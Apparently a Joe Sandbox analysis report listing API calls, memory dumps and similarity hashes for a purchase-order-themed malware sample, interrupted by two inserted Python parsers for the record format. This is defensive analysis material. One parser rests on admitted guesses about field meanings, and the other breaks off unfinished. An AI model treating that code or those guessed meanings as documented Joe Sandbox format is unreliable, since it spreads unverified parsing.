• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
• Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
• Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
• Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
• Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
• Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
• Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
• Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
• Opcode Fuzzy Hash: 6ef0c3512c2906a1c08331c62920983107679ca7315389df55633a20f56d33da
• Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
Uniqueness
Uniqueness Score: -1.00%
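
One way to work with these function records at scale, as an added example that is not part of the Joe Sandbox report: a small Python parser for the record layout shown above (API lines with module and call-site address, the memory dump descriptors, the similarity hashes and the uniqueness score). The embedded sample is a constructed excerpt mirroring two of the records in this section. The meaning assigned to the dotted .sdmp descriptor fields (region base address, page protection, allocation type) is an assumption inferred from the PE layout visible in the report, not a documented Joe Sandbox format.

```python
"""Parser for Joe Sandbox function records (added example, not report code).

The report lists, per disassembled function, the Win32 APIs it calls, the
memory dump the code was read from and a set of similarity hashes. This
script turns that text into structured records and decodes the dump
descriptor, which helps when triaging many records at once.
"""
import re
from dataclasses import dataclass, field

# Assumption: in '<pid>.<n>.<id>.<base>.<protect>.<n>.<type>.<n>.sdmp' the
# 4th field is the region base, the 5th the page protection and the 7th
# the allocation type. This matches the report (0x20 at 0x401000 for the
# executable .text section, 0x04 for writable data, 0x01000000 = MEM_IMAGE).
PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEMTYPE = {0x1000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}

API_RE = re.compile(r"^• (?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(r"^• Source File: (?P<name>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+)")
ASSOC_RE = re.compile(r"^• Associated: (?P<name>\S+\.sdmp)")
SIM_RE = re.compile(r"^• (?P<key>[A-Za-z ]+ ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(?P<val>.*)$")
UNIQ_RE = re.compile(r"^Uniqueness Score: (?P<val>.+)$")

# Constructed excerpt in the report's record layout (two records).
SAMPLE = r"""
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
• GetLastError.KERNEL32 ref: 0040570F
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
Similarity
• API ID: CreateDirectoryErrorLast
• Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Uniqueness Score: -1.00%
APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
Memory Dump Source
• Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
Uniqueness Score: -1.00%
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int          # address of the call site inside the dumped image


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source: str = ""
    image_base: int = 0
    associated: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    uniqueness: str = ""


def parse_records(text):
    """Split report text into one FunctionRecord per 'APIs' heading."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] is not None else []
            cur.apis.append(ApiCall(m["fn"], m["mod"], args, int(m["ref"], 16)))
        elif m := SOURCE_RE.match(line):
            cur.source, cur.image_base = m["name"], int(m["off"], 16)
        elif m := ASSOC_RE.match(line):
            cur.associated.append(m["name"])
        elif m := SIM_RE.match(line):
            cur.similarity[m["key"]] = m["val"]
        elif m := UNIQ_RE.match(line):
            cur.uniqueness = m["val"]
    return records


def parse_dump_descriptor(name):
    """Decode a dotted .sdmp name into base address, protection and type."""
    parts = name.split(".")
    if len(parts) != 9 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected descriptor: {name}")
    protect, memtype = int(parts[4], 16), int(parts[6], 16)
    return {"dump_id": parts[2], "base": int(parts[3], 16),
            "protect": PROTECT.get(protect, hex(protect)),
            "type": MEMTYPE.get(memtype, hex(memtype))}


def apis_by_module(records):
    """Map each module to the sorted list of APIs called from any record."""
    out = {}
    for rec in records:
        for call in rec.apis:
            out.setdefault(call.module, set()).add(call.name)
    return {mod: sorted(names) for mod, names in out.items()}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        region = parse_dump_descriptor(rec.source)
        for call in rec.apis:
            rva = call.ref - rec.image_base
            print(f"{call.module}!{call.name} at RVA {rva:#x} in {region['protect']} region")
```

The `ref` value minus the `Offset` of the source dump gives the call site's RVA (0x405701 - 0x400000 = 0x5701), which is what you need to jump to the function in the dumped image from the IDA snapshot file named in each record.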

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                              • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                              • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                              • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                              • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                              • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                              • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00403266
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                              • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                              • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                              • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                                                              • Instruction ID: d12e9c11b6b9b854787454326f23abfe3faf9d6a634dc5341367369e5c825980
                                                                                              • Opcode Fuzzy Hash: f5155c82eacd931717c49448e5e104d46a4312587cf016571ad76e57a440d271
                                                                                              • Instruction Fuzzy Hash: B0D01277B141009BE750EFB9BF89CAF73A8EB913293254837D902E10E2D57CD801862C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                              • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                              • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 1638840714-813528018
                                                                                              • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                              • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                              • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                              • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
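A parser for the per-function record format used in this listing, as an added example (not Joe Sandbox's own code or any documented export of the IDA plugin): it turns the "APIs" lines and the "Similarity"/"Uniqueness" fields into Python objects so the call-site sequence, the modules touched and the fuzzy hashes can be compared across samples instead of read by eye. SAMPLE is a constructed two-record excerpt whose values are copied from this page (the second record is cut short, as it is above); the regular expressions encode an assumption about the plugin's printed layout, not a published grammar.

```python
"""Parse Joe Sandbox IDA-plugin function records (as printed on the report page).

Added example; not Joe Sandbox code. Layout assumed from the page: each record
starts with an 'APIs' section of '• Name.MODULE(args), ref: ADDR' lines (indented
'Part of subcall function ADDR:' lines are calls made by a callee), followed by
'Memory Dump Source', 'Joe Sandbox IDA Plugin', 'Similarity' and 'Uniqueness'
sections of '• Key: value' lines.
"""
from __future__ import annotations

import csv
import re
from collections import Counter
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"       # e.g. SendMessageW.USER32
    r"(?:\((?P<args>.*)\))?"                # argument list is optional (wsprintfW has none)
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)
# '• Key: value' lines and the un-bulleted 'Uniqueness Score: -1.00%' line.
FIELD_RE = re.compile(r"^\s*(?:•\s*)?(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: str | None          # call-site address as printed after 'ref:'
    subcall_of: str | None   # callee address for 'Part of subcall function' lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # 'API ID', 'Opcode ID', ...

    @property
    def direct_calls(self) -> list[ApiCall]:
        return [a for a in self.apis if a.subcall_of is None]


def _split_args(raw: str | None) -> tuple[str, ...]:
    """Split the printed argument list; csv keeps a double-quoted path with its commas intact."""
    if raw is None:
        return ()
    return tuple(next(csv.reader([raw])))


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    section = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.strip() == "APIs":            # every record opens with its APIs section
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if current is None:                   # lines before the first record (a cut-off one)
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            current.apis.append(ApiCall(m["name"], m["module"], _split_args(m["args"]),
                                        m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            current.fields[f["key"]] = f["val"]   # repeated keys keep the last value
        else:
            section = line.strip()            # 'Strings', 'Similarity', 'Uniqueness', ...
    return records


def api_sequence(rec: FunctionRecord, include_subcalls: bool = False) -> list[str]:
    """API names in call-site address order: a cheap behavioural signature of one function."""
    calls = rec.apis if include_subcalls else rec.direct_calls
    return [c.name for c in sorted(calls, key=lambda c: int(c.ref or "0", 16))]


def find_callers(records: list[FunctionRecord], api_name: str) -> list[tuple[int, str]]:
    """(record index, call-site address) for every direct call of api_name."""
    return [(i, c.ref) for i, r in enumerate(records) for c in r.direct_calls if c.name == api_name]


def modules_used(records: list[FunctionRecord]) -> Counter:
    return Counter(c.module for r in records for c in r.apis)


# Constructed excerpt: two records with values taken from this page, the second cut short.
SAMPLE = r"""
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00403266
Memory Dump Source
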